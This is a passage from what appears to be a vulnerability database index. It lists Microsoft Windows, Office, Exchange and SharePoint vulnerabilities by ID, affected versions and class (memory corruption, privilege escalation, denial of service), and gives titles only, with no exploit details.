Windows 2000/Server 2003/XP Server Protocol Driver memory corruption [2369] Microsoft Windows 2000/Server 2003/XP Server Service Mailslot memory corruption [2367] Microsoft Office 2000/2003/XP Document String privilege escalation [2366] Microsoft Windows 2000/Server 2003/XP DHCP Client memory corruption [2365] Microsoft Office 2000/2003/XP PNG Image memory corruption [2364] Microsoft Office 2000/2003/XP GIF Image memory corruption [2357] Microsoft Excel up to 2003 on Asian System Document Repair Style memory corruption [2325] Microsoft Excel up to 2003 Hyperlink hlink.dll memory corruption [2324] Microsoft Excel 2000/2002/2003/2004 XLS File memory corruption [2312] Microsoft Exchange 2000 Outlook Web Access cross site scripting [2311] Microsoft Windows 2000/Server 2003/XP MRXSMB.SYS MRxSmbCscIoctlOpenForCopyChunk privilege escalation [2310] Microsoft Windows 2000 RPC weak authentication [2309] Microsoft Windows 2000/Server 2003/XP Routing/Remote Access Service memory corruption [2308] Microsoft PowerPoint 2000/2002/2003/2004 PPT Document memory corruption [2307] Microsoft Windows 2000/Server 2003/XP JScript Object memory corruption [2306] Microsoft Windows 2000/Server 2003/XP IP Source Routing memory corruption [2305] Microsoft Windows Server 2003/XP ART Image memory corruption [2294] Microsoft Word up to 2003 DOC Document privilege escalation [2275] Microsoft Windows Server 2003/XP mhtml URI inetcomm.dll memory corruption [2253] Microsoft Word up to 2003 privilege escalation [2221] Microsoft Windows 2000/XP CHM Archive itss.dll memory corruption [2218] Microsoft Windows 2000/Server 2003/XP MSDTC memory corruption [2217] Microsoft Exchange 2000/2003 Calender Collaboration Data Object memory corruption [2190] Microsoft Office 2003 mailto URI unknown vulnerability [2147] Microsoft Windows 2000/Server 2003/XP COM Object memory corruption [2053] Microsoft Office/Visio/Project 2003 Korean Input Method Editor privilege escalation [2052] Microsoft PowerPoint 2000 HTML Rendering information disclosure [2051] Microsoft Windows Server 2003/XP Web Client Service memory corruption [2050] Microsoft Windows Server 2003/XP TCP/IP IGMP memory corruption [2049] Microsoft Windows 2000/Server 2003/XP Media Player memory corruption [2036] Microsoft Windows Server 2003/XP Service privilege escalation [1971] Microsoft Visual Studio 2005 Form Loader load memory corruption [1963] Microsoft Outlook 2000/2002/2003 TNEF MIME Attachment Integer Coercion Error [1962] Microsoft Windows 2000/Server 2003/XP Web Fonts memory corruption [1934] Microsoft Windows Server 2003/XP WMF File privilege escalation [1876] Microsoft Windows 2000/XP WMF/EMF File Integer Coercion Error [1801] Microsoft Windows 2000/Server 2003/XP Client Service for Netware memory corruption [1798] Microsoft Windows 2000/Server 2003/XP Transaction Internet Protocol denial of service [1797] Microsoft Windows 2000/Server 2003/XP COM+ memory corruption [1796] Microsoft Windows 2000/Server 2003/XP Distributed Transaction Coordinator memory corruption [1793] Microsoft Windows 2000/Server 2003/XP Explorer HTML Preview cross site scripting [1792] Microsoft Windows 2000/Server 2003/XP lnk File memory corruption [1791] Microsoft Windows 2000/Server 2003/XP lnk File memory corruption [1790] Microsoft Exchange 2000 SMTP Collaboration Data Object memory corruption [1789] Microsoft Windows 2000/Server 2003/XP Plug-and-Play Service memory corruption [1737] Microsoft Exchange 2003 IMAP4 Service Store.exe denial of service [1692] Microsoft Windows up to Server 2003 Print Spooler memory corruption [1691] Microsoft Windows 2000/Server 2003/XP Kerberos memory corruption [1690] Microsoft Windows 2000/Server 2003/XP Kerberos denial of service [1689] Microsoft Windows up to Server 2003 Plug-and-Play Service memory corruption [1669] Microsoft Word 2000 Shared Sections denial of service [1668] Microsoft PowerPoint 2000 Shared Sections denial of service [1667] Microsoft Outlook 2000 Shared Sections denial of service [1666] Microsoft Office 2000 Shared Sections denial of service [1665] Microsoft Excel 2000 Shared Sections denial of service [1664] Microsoft Access 2000 Shared Sections denial of service [1623] Microsoft Windows 2000/XP Network Connectivity netman.dll denial of service [1597] Microsoft Word 2000/2002 Font Parser memory corruption [1596] Microsoft Windows 95/98/2000/Server 2003/XP Color Management memory corruption [1570] Microsoft Windows 2000/Server 2003/XP SMB memory corruption [1569] Microsoft Windows Server 2003/XP Web Client Service memory corruption [1568] Microsoft Windows 2000/Server 2003/XP Agent Internet Content cross site scripting [1567] Microsoft Windows 2000/Server 2003/XP HTML Help Input memory corruption [1547] Microsoft Windows 2000/Server 2003/XP Remote Desktop mstlsapi.dll weak authentication [1407] Microsoft Windows 2000 Web View webvw.dll memory corruption [1358] Microsoft Windows 2000/Server 2003/XP CSRSS memory corruption [1357] Microsoft Windows 2000/Server 2003/XP Objekt Manager memory corruption [1356] Microsoft Windows 2000/Server 2003/XP Kernel Access memory corruption [1355] Microsoft Windows 2000/Server 2003/XP Font File memory corruption [1351] Microsoft Exchange 2000/2003 SMTP Service memory corruption [1350] Microsoft Windows 2000/Server 2003/XP Shell MSHTA.EXE memory corruption [1349] Microsoft Windows 2000/XP SP1 RPC Message Queue memory corruption [1328] Microsoft Windows Server 2003 Print Color Adjustment denial of service [1327] Microsoft Windows Server 2003 SMB denial of service [1291] Microsoft Windows 2000 EMF File GetEnhMetaFilePaletteEntries denial of service [1269] Microsoft Exchange 2003 Sub-Directories Store.exe denial of service [1268] Microsoft Windows Server 2003/XP TCP/IP Stack denial of service [1196] Microsoft Windows up to XP/Server 2003 Drag / Drop memory corruption [1193] Microsoft Windows NT 4.0/2000/Server 2003 License Logging Server privilege escalation [1192] Microsoft Office 2000/2002/XP URL memory corruption [1189] Microsoft Windows 2000/Server 2003/XP SMB memory corruption [1188] Microsoft Exchange 2003 Outlook Web Access owalogon.asp information disclosure [1107] Microsoft Windows Server 2003/XP Indexing Service memory corruption [1042] Microsoft Windows up to Server 2003 HyperTerminal URL memory corruption [981] Microsoft Proxy Server/ISA Server up to 2000 DNS Revese Lookup Cache weak authentication [897] Microsoft Windows Server 2003/XP ZIP Archive dunzip32.dll memory corruption [885] Microsoft Windows 2000/Server 2003/XP WebDAV XML Message denial of service [883] Microsoft Windows NT 4.0/2000/Server 2003 memory corruption [881] Microsoft Excel 2000/2001/2002 memory corruption [877] Microsoft Word 2002 DOC Document denial of service [862] Microsoft Windows 2000/XP SYSTEM32 memory corruption [860] Microsoft Windows 2000/XP Packet Fragmentation denial of service [761] Microsoft Windows 2000 Utility Manager winhlp32.exe memory corruption [705] Microsoft ISA Server 2000 SP2 Web Proxy denial of service [704] Microsoft ISA Server 2000 SP2 Web Proxy privilege escalation [703] Microsoft ISA Server 2000 SP2 Web Proxy denial of service [702] Microsoft ISA Server 2000 SP2 External HTTP Traffic weak encryption [701] Microsoft ISA Server 2000 SP2 ICMP unknown vulnerability [683] Microsoft Windows 2000 weak authentication [664] Microsoft Windows 2000/XP CLSID desktop.ini memory corruption [663] Microsoft Outlook 2003 RTF Document OLE Object containing privilege escalation [652] Microsoft Outlook 2003 HTML Mail Reply privilege escalation [618] Microsoft Windows Server 2003 MS04-011 Patch unknown vulnerability [610] Microsoft Windows up to XP/Server 2003 ASN.1 Library memory corruption [609] Microsoft Windows 2000/Server 2003/XP Negotiate Security Software Provider memory corruption [605] Microsoft Windows 2000 Utility Manager memory corruption [604] Microsoft Windows Server 2003/XP Help/Support Center memory corruption [603] Microsoft Windows 2000 Metafile WMF/EMF Integer Coercion Error [601] Microsoft Windows up to XP/Server 2003 PCT Message memory corruption [600] Microsoft Windows 2000 Domain Controller memory corruption [599] Microsoft Windows up to Server 2003 LSASS Request memory corruption [598] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPC/DCOM Object Identity unknown vulnerability [597] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPC over HTTP Reply denial of service [596] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPCSS denial of service [551] Microsoft Outlook 2002/XP mailto cross site scripting [518] Microsoft Windows Server 2003/XP ntdll.dll unknown vulnerability [509] Microsoft Windows NT 4.0/2000/XP/Server 2003 WINS Server GS privilege escalation [508] Microsoft Windows NT 4.0/2000/XP/Server 2003 ASN.1 lsass.exe Integer Coercion Error [479] Microsoft Exchange 2003 Outlook Web Access information disclosure [477] Microsoft ISA Server 2000 H.323 Filter memory corruption [476] Microsoft ISA Server 2000 H.323/H.225.0/Q.931 memory corruption [419] Microsoft Exchange 2003 Outlook Web Access information disclosure [385] Microsoft Excel up to 2002 Macro Security memory corruption [383] Microsoft Windows 2000/XP Workstation Service memory corruption [350] Microsoft Windows 2000/NT/Server 2003/XP HTML Help memory corruption [331] Microsoft Windows 2000/XP RPCSS race condition [328] Microsoft Windows 2000 Message Queuing Service mqsvc.exe memory corruption [323] Microsoft Windows Server 2003 Shell Folder information disclosure [312] Microsoft Windows 2000/Server 2003/Vista/XP PostThreadMessage unknown vulnerability [286] Microsoft Windows Server 2003 Buffer Overflow Protection unknown vulnerability [277] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPCSS memory corruption [249] Microsoft Windows NT 4.0/2000/XP/Server 2003 Blaster/Eske memory corruption [199] Microsoft MSDE/SQL Server 2000 LPC memory corruption [178] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPC DCOM PerformScmStage memory corruption [177] Microsoft ISA Proxy 2000 Error Site cross site scripting [175] Microsoft Windows up to 2000 SP3 SMTP Timestamp denial of service [164] Microsoft Windows up to XP/Server 2003 HTML Converter memory corruption [158] Microsoft Windows 2000/XP rundll32.exe memory corruption [155] Microsoft Windows up to 2000 SP3 LDAP Cryptnet.DLL denial of service [154] Microsoft Windows up to 2000 SP3 RPC unknown vulnerability [153] Microsoft Windows 2000 Terminal Service unknown vulnerability [151] Microsoft Windows up to 2000 SP3 ModifyDN Request denial of service [150] Microsoft Windows up to 2000 SP3 Domain Controller unknown vulnerability [149] Microsoft Windows up to 2000 SP3 Port Name API memory corruption [146] Microsoft Windows up to 2000 SP3 IMAADPCM cbDestLength memory corruption [145] Microsoft Windows 2000 Active Directory weak authentication [135] Microsoft Windows 2000 API ShellExecute memory corruption [134] Microsoft Windows up to 2000 SP3 Active Directory memory corruption [12] Microsoft Outlook 2000/Express 6 window.PopUp privilege escalation [4] Microsoft Windows 2000 NetBIOS denial of service [176522] Microsoft Windows 7 SP1 up to Server 2019 MSHTML Platform unknown vulnerability [176515] Microsoft Windows 10 up to Server 2019 Hyper-V denial of service [176514] Microsoft Windows 8.1 up to Server 2019 Server for NFS information disclosure [176513] Microsoft Windows 8.1 up to Server 2019 Server for NFS information disclosure [176512] Microsoft Windows 8.1 up to Server 2019 NFS denial of service [176511] Microsoft Windows 7 SP1 up to Server 2019 GPSVC unknown vulnerability [176510] Microsoft Windows 7 SP1 up to Server 2019 Event Tracing information disclosure [176509] Microsoft Windows 7 SP1 up to Server 2019 HTML Platform unknown vulnerability [176508] Microsoft Windows 8.1 up to Server 2019 TCP/IP Driver denial of service [176507] Microsoft Windows 10 20H2 up to Server 2019 Cloud Files Mini Filter Driver unknown vulnerability [176506] Microsoft Windows 7 SP1 up to Server 2019 Remote Desktop Services denial of service [176504] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [176503] Microsoft SharePoint Server 2013 SP1/2016/2019 information disclosure [176502] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [176501] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [176500] Microsoft Windows 7 SP1 up to Server 2019 Kerberos AppContainer unknown vulnerability [176498] Microsoft Windows 7 SP1 up to Server 2019 Scripting Engine unknown vulnerability [176497] Microsoft Windows 7 SP1 up to Server 2019 NTLM unknown vulnerability [176495] Microsoft Windows 7 SP1 up to Server 2019 NTFS unknown vulnerability [176493] Microsoft Windows 7 SP1 up to Server 2019 Common Log File System Driver unknown vulnerability [176492] Microsoft Windows 7 SP1 up to Server 2019 Filter Manager unknown vulnerability [176491] Microsoft Windows 10 20H2 up to Server 2019 Kernel-Mode Driver unknown vulnerability [176490] Microsoft Windows 10 20H2 up to Server 2019 Kernel unknown vulnerability [176489] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [176488] Microsoft Outlook 2013 RT SP1/2013 SP1/2016/2019 unknown vulnerability [176487] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [176481] Microsoft Office 2013 RT SP1/2013 SP1/2016/2019 Graphics unknown vulnerability [176480] Microsoft Office 2013 RT SP1/2013 SP1/2016/2019 Graphics unknown vulnerability [176477] Microsoft Windows 7 SP1 up to Server 2019 Enhanced Cryptographic Provider unknown vulnerability [176475] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [176474] Microsoft Windows 7 SP1 up to Server 2019 DCOM Server unknown vulnerability [174874] Microsoft Windows 7 SP1 up to Server 2019 Wireless Networking unknown vulnerability [174873] Microsoft Windows 7 SP1 up to Server 2019 Wireless Networking information disclosure [174872] Microsoft Visual Studio up to 2019 Version 16.9 unknown vulnerability [174871] Microsoft Windows 7 SP1 up to Server 2019 Wireless Networking unknown vulnerability [174870] Microsoft Windows 7 SP1 up to Server 2019 unknown vulnerability [174868] Microsoft Windows 8.1 up to Server 2019 CSC Service information disclosure [174864] Microsoft Windows 10 20H2 up to Server 2019 Container Manager Service unknown vulnerability [174861] Microsoft Windows 10 20H2 up to Server 2019 Graphics unknown vulnerability [174860] Microsoft SharePoint Server 2013 SP1/2016/2019 information disclosure [174859] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [174858] Microsoft SharePoint Server 2013 SP1/2016/2019 information disclosure [174850] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [174849] Microsoft Windows 7 SP1 up to Server 2019 Bluetooth Driver unknown vulnerability [174848] Microsoft Windows 7 SP1 up to Server 2019 Infrared Data Association information disclosure [174846] Microsoft Windows 7 SP1 up to Server 2019 RDP information disclosure [174844] Microsoft Windows 7 SP1 up to Server 2019 Graphics unknown vulnerability [174843] Microsoft Windows 10 1809/Server 2019 Container Isolation FS Filter Driver unknown vulnerability [174842] Microsoft Windows 10 20H2 up to Server 2019 Projected File System FS Filter Driver information disclosure [174840] Microsoft Windows 7 SP1 up to Server 2019 on SSDP Service unknown vulnerability [174839] Microsoft Windows 7 SP1 up to Server 2019 OLE Automation unknown vulnerability [174838] Microsoft Exchange Server 2013 CU23/2016 CU19/2016 CU20/2019 CU8/2019 CU9 unknown vulnerability [174837] Microsoft Exchange Server 2013 CU23/2016 CU19/2016 CU20/2019 CU8/2019 CU9 unknown vulnerability [174834] Microsoft Exchange Server 2013 CU23/2016 CU19/2016 CU20/2019 CU8/2019 CU9 unknown vulnerability [174832] Microsoft Exchange Server 2013 CU23/2016 CU16/2016 CU20/2019 CU8/2019 CU9 unknown vulnerability [174828] Microsoft Lync Server/Skype for Business Server 2013 CU10/2015 CU11 unknown vulnerability [174827] Microsoft Lync/Skype for Business Server 2013 CU10/2015 CU11/2019 CU5 unknown vulnerability [174825] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [174824] Microsoft Windows 7 SP1 up to Server 2019 Hyper-V VmsIfrInfoParams_OID_SWITCH_NIC_REQUEST unknown vulnerability [174823] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [174822] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [174540] Dell EMC Integrated System for Microsoft Azure Stack Hub up to 2011 hard-coded credentials [172949] Microsoft Windows 10 up to Server 2019 Media Photo Codec information disclosure [172947] Microsoft Windows 7 SP1 up to Server 2019 Internet Messaging API unknown vulnerability [172941] Microsoft Windows 7 SP1 up to Server 2019 Media Video Decoder unknown vulnerability [172937] Microsoft Windows 10 20H2 up to Server 2019 Hyper-V denial of service [172933] Microsoft Windows 10 20H2 up to Server 2019 Application Compatibility Cache denial of service [172929] Microsoft Windows 7 SP1 up to Server 2019 Media Video Decoder unknown vulnerability [172925] Microsoft Windows 10 20H2 up to Server 2019 TCP/IP Driver denial of service [172921] Microsoft Windows 7 SP1 up to Server 2019 DNS information disclosure [172919] Microsoft Windows 8.1 up to Server 2019 SMB information disclosure [172917] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172916] Microsoft Windows 7 SP1 up to Server 2019 DNS information disclosure [172915] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172914] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172913] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172912] Microsoft Windows 7 SP1 up to Server 2019 on Remote Procedure Call Runtime unknown vulnerability [172911] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172910] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172909] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172908] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172907] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172906] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172905] Microsoft Windows 7 SP1 up to Server 2019 on Remote Procedure Call Runtime unknown vulnerability [172904] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172903] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172902] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172901] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172900] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172899] Microsoft Windows 8.1 up to Server 2019 Remote Procedure Call Runtime Remote unknown vulnerability [172898] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172896] Microsoft Windows 7 SP1 up to Server 2019 GDI+ unknown vulnerability [172895] Microsoft Windows 7 SP1 up to Server 2019 GDI+ unknown vulnerability [172894] Microsoft Windows 7 SP1 up to Server 2019 GDI+ unknown vulnerability [172892] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172891] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172890] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172889] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172888] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172887] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172886] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172885] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172880] Microsoft Windows 7 SP1 up to Server 2019 TCP/IP Driver denial of service [172877] Microsoft Windows 10 20H2 up to Server 2019 TCP/IP information disclosure [172875] Microsoft Windows 8.1 up to Server 2019 Hyper-V unknown vulnerability [172874] Microsoft Windows 7 SP1 up to Server 2019 Network File System unknown vulnerability [172870] Microsoft Office 365 Apps for Enterprise up to 2019 Excel unknown vulnerability [172869] Microsoft SharePoint 2010 SP2/2013 SP1/2016/2019 Update denial of service [172861] Microsoft Azure DevOps Server 2020.0.1 unknown vulnerability [172853] Microsoft Exchange Server 2013 CU23/2016 CU20/2019 CU9 unknown vulnerability [172852] Microsoft Exchange Server 2013 CU23/2016 CU20/2019 CU9 unknown vulnerability [172851] Microsoft Exchange Server 2013 CU23/2016 CU20/2019 CU9 unknown vulnerability [172850] Microsoft Exchange Server 2013 CU23/2016 CU20/2019 CU9 unknown vulnerability [171012] Microsoft Windows 10 20H2 up to Server 2019 NAT denial of service [171000] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [170999] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [170998] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [170997] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [170996] Microsoft Windows Server 20H2 up to Server 2019 DNS Server code injection [170995] Microsoft Windows Server 20H2 up to Server 2019 DNS Server denial of service [170994] Microsoft Windows Server 20H2 up to Server 2019 DNS Server denial of service [170981] Microsoft Windows 7 SP1 up to Server 2019 Remote Access API privileges management [170979] Microsoft Windows 10 20H2 up to Server 2019 OpenType Font Parser code injection [170978] Microsoft Windows 7 SP1 up to Server 2019 Media Foundation unknown vulnerability [170974] Microsoft SharePoint Server/Office Web Apps 2010 SP2/2013 SP1/2016/2019 unknown vulnerability [170973] Microsoft SharePoint Server/Office Web Apps 2016/2019 information disclosure [170972] Microsoft Office 365 Apps for Enterprise up to 2019 PowerPoint unknown vulnerability [170970] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016 unknown vulnerability [170969] Microsoft Office 365 Apps for Enterprise up to Web Apps 2013 SP1 unknown vulnerability [170968] Microsoft Office 365 Apps for Enterprise up to 2019 unknown vulnerability [170945] Microsoft Visual Studio 2017 Version 15.9/2019 Version 16.9 Git link following [170907] Microsoft Windows 10 20H2 up to Server 2019 Application Virtualization code injection [170596] Microsoft Exchange Server 2013 CU23/2016 CU18/2016 CU19/2019 CU7/2019 CU8 unknown vulnerability [170595] Microsoft Exchange Server 2013 CU23/2016 CU18/2016 CU19/2019 CU7/2019 CU8 unknown vulnerability [170594] Microsoft Exchange Server 2013 CU23/2016 CU18/2016 CU19/2019 CU7/2019 CU8 unknown vulnerability [170593] Microsoft Exchange Server 2013 CU23/2016 CU18/2016 CU19/2019 CU7/2019 CU8 unknown vulnerability [170592] Microsoft Exchange Server 2013 CU23/2016 CU18/2016 CU19/2019 CU7/2019 CU8 unknown vulnerability [170591] Microsoft Exchange Server 2013 CU23/2016 CU18/2016 CU19/2019 CU7/2019 CU8 unknown vulnerability [170590] Microsoft Exchange Server 2013 CU23/2016 CU18/2016 CU19/2019 CU7/2019 CU8 unknown vulnerability [170436] Microsoft Windows 8.1 up to Server 2019 Extended Protection for Authentication improper authentication [169530] Microsoft Windows 7 SP1 up to Server 2019 Trust Verification API denial of service [169529] Microsoft Windows 7 SP1 up to Server 2019 TCP/IP unknown vulnerability [169528] Microsoft Windows 7 SP1 up to Server 2019 TCP/IP unknown vulnerability [169527] Microsoft Windows 7 SP1 up to Server 2019 TCP/IP denial of service [169526] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call information disclosure [169525] Microsoft Windows 7 SP1 up to Server 2019 Local Spooler unknown vulnerability [169524] Microsoft Windows 10 20H2 up to Server 2019 Microsoft.PowerShell.Utility Module protection mechanism [169509] Microsoft Windows 7 SP1 up to Server 2019 Address Book unknown vulnerability [169507] Microsoft Visual Studio up to 2017 15.9/2019 16.8 unknown vulnerability [169502] Microsoft Windows 7 SP1 up to Server 2019 Fax Service unknown vulnerability [169501] Microsoft Windows 7 SP1 up to Server 2019 Fax Service unknown vulnerability [169499] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [169498] Microsoft Windows 10 up to Server 2019 unknown vulnerability [169495] Microsoft SharePoint 2013 SP1/2016/2019 unknown vulnerability [169494] Microsoft SharePoint 2010 SP2/2013 SP1/2016/2019 unknown vulnerability [169493] Microsoft SharePoint 2010 SP2/2013 SP1/2016/2019 unknown vulnerability [169492] Microsoft SharePoint 2010 SP2/2013 SP1/2016/2019 information disclosure [169487] Microsoft Windows 10 up to Server 2019 Graphics unknown vulnerability [169486] Microsoft Exchange Server 2016 CU18/2019 CU7 unknown vulnerability [169485] Microsoft Exchange Server 2016 CU18/2016 CU19/2019 CU7/2019 CU8 unknown vulnerability [167703] Microsoft Windows 7 SP1 up to Server 2019 Update Stack privileges management [167700] Microsoft Windows 10 up to Server 2019 RDP authorization [167699] Microsoft Windows 7 SP1 up to Server 2019 RDP Core unknown vulnerability [167687] Microsoft Windows 7 SP1 up to Server 2019 Graphics information disclosure [167686] Microsoft Windows 7 SP1 up to Server 2019 GDI+ information disclosure [167685] Microsoft Windows 7 SP1 up to Server 2019 Fax Compose Form privileges management [167680] Microsoft Windows 7 SP1 up to Server 2019 CryptoAPI denial of service [167666] Microsoft Visual Studio 2017 Version 15.9/2019 Version 16.8 cross site scripting [167664] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167663] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167662] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167661] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167660] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167659] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167658] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167657] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167656] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167655] Microsoft Windows 8.1 up to Server 2019 NTLM unknown vulnerability [167651] Microsoft Windows 7 SP1 up to Server 2019 Media Foundation unknown vulnerability [167650] Microsoft SharePoint Server 2013 SP1/2016/2019 input validation [167649] Microsoft SharePoint Server 2013 SP1/2016/2019 input validation [167648] Microsoft SharePoint Foundation 2010 SP2 unknown vulnerability [167647] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 unknown vulnerability [167646] Microsoft SharePoint Server 2016/2019 privileges management [167645] Microsoft SharePoint Server 2013 SP/2016/2019 privileges management [167644] Microsoft SQL Server 2012 SP4/2014 SP3/2016 SP2/2017 CU22/2019 CU8 sql injection [167643] Microsoft Office 365 Apps for Enterprise up to 2019 unknown vulnerability [167638] Microsoft Windows 7 SP1 up to Server 2019 DTV-DVD Video Decoder unknown vulnerability [167637] Microsoft Windows 8.1/10/10 1607/Server 2012 R2/Server 2016 Hyper-V denial of service [167633] Microsoft Windows 7 SP1 up to Server 2019 GDI+ unknown vulnerability [160966] Microsoft SQL Server 2017/2019 Reporting Services privilege escalation [160963] Microsoft Windows up to Server 2019 Projected Filesystem privilege escalation [160952] Microsoft Office 2016/2019 on macOS information disclosure [160951] Microsoft Windows up to Server 2019 Kernel memory corruption [160947] Microsoft Windows up to Server 2019 UPnP Service privilege escalation [160946] Microsoft Windows up to Server 2019 TLS weak encryption [160945] Microsoft Excel up to 2019 memory corruption [160944] Microsoft Windows up to Server 2019 Kernel Improper Initialization [160943] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [160942] Microsoft Windows up to Server 2019 Kernel information disclosure [160941] Microsoft SharePoint Server 2013 SP1 cross site scripting [160940] Microsoft Windows up to Server 2019 Storage Services privilege escalation [160938] Microsoft SharePoint Server 2019 Profile Data privilege escalation [160937] Microsoft SharePoint Server 2013 SP1/2016/2019 cross site scripting [160936] Microsoft Windows up to Server 2019 Microsoft COM for Windows privilege escalation [160933] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 cross site scripting [160932] Microsoft Windows up to Server 2019 CloudExperienceHost privilege escalation [160931] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 Profile Data privilege escalation [160930] Microsoft Windows up to Server 2019 fdSSDP.dll privilege escalation [160929] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 cross site scripting [160927] Microsoft Excel up to 2019 memory corruption [160926] Microsoft Office up to 2019 Excel memory corruption [160925] Microsoft Windows up to Server 2019 DirectX privilege escalation [160924] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [160923] Microsoft Windows up to Server 2019 GDI information disclosure [160922] Microsoft Windows up to Server 2019 Win32k information disclosure [160921] Microsoft Windows up to Server 2019 Win32k privilege escalation [160920] Microsoft Windows up to Server 2019 DNS denial of service [160919] Microsoft SharePoint Server 2013 SP1/2016/2019 cross site scripting [160916] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 privilege escalation [160915] Microsoft SharePoint Server 2013 SP1/2016/2019 cross site scripting [160914] Microsoft Office up to 2019 Excel memory corruption [160912] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [160910] Microsoft Windows up to Server 2019 Win32k.sys privilege escalation [160909] Microsoft Windows up to Server 2019 Store Runtime privilege escalation [160908] Microsoft Windows up to Server 2019 Diagnostics Hub Standard Collector privilege escalation [160907] Microsoft Windows up to Server 2019 Diagnostics Hub Standard Collector privilege escalation [160906] Microsoft Windows up to Server 2019 Language Pack Installer privilege escalation [160904] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [160902] Microsoft Windows up to Server 2019 GDI Dynamically-Managed Code Resources [160901] Microsoft Windows up to Server 2019 Graphics Component Dynamically-Managed Code Resources [160900] Microsoft Windows up to Server 2019 Graphics Component memory corruption [160899] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [160898] Microsoft Windows up to Server 2019 DirectX privilege escalation [160895] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [160894] Microsoft Windows up to Server 2019 Routing Utilities denial of service [160892] Microsoft Windows up to Server 2019 Kernel information disclosure [160891] Microsoft Windows up to Server 2019 DHCP Server information disclosure [160890] Microsoft Windows up to Server 2019 Print Spooler privilege escalation [160889] Microsoft Windows up to Server 2019 Group Policy privilege escalation [160886] Microsoft Windows up to Server 2019 Mobile Device Management privilege escalation [160883] Microsoft Windows up to Server 2019 Kernel information disclosure [160882] Microsoft Windows up to Server 2019 Graphics Component information disclosure [160881] Microsoft Windows up to Server 2019 State Repository Service information disclosure [160880] Microsoft Windows up to Server 2019 Function Discovery SSDP Provider privilege escalation [160879] Microsoft Windows up to Server 2019 Modules Installer privilege escalation [160876] Microsoft Windows up to Server 2019 Storage Services privilege escalation [160874] Microsoft Windows up to Server 2019 Shell Infrastructure memory corruption [160873] 